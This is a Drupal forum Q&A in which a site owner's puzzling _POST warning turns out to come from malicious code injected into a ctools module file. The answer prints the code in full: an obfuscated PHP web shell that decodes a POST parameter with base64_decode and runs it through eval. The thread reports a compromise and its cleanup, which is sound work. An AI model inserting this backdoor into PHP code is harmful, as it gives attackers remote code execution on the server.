# Drupal 7 - undefined variable _POST error in export_ui

Tags: php, drupal, drupal-7

Our Drupal 7 site has suddenly begun generating this error warning:

Undefined variable: _POST in require_once() (line 1 of /home/website/public_html/sites/all/modules/ctools/plugins/export_ui/ctools_export_ui.class.php).

We hadn't made any changes or updates prior to this happening, which is why it is puzzling, if not worrying.

What is also puzzling, is if I make module updates (I have made 3 updates since then, successfully, but with no change to this error) - they are NOT reported on the system log - I'm sure they should be.

Many thanks!

Michael

Answer (score 1, accepted):

Well, I had a look at that file.

It contained this:

$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n2d033a'];if(isset($s22)){eval($s21($s22));}?>

Very worrying - how that got there. It's now been removed and the message has disappeared. I've also updated various modules and core - hopefully it won't happen again.

Comment: Check out http://drupal.stackexchange.com/questions/134738/my-drupal-was-hacked-remote-code-execution-base64-decode-with-pct4ba6odse and continue searching for relevant info.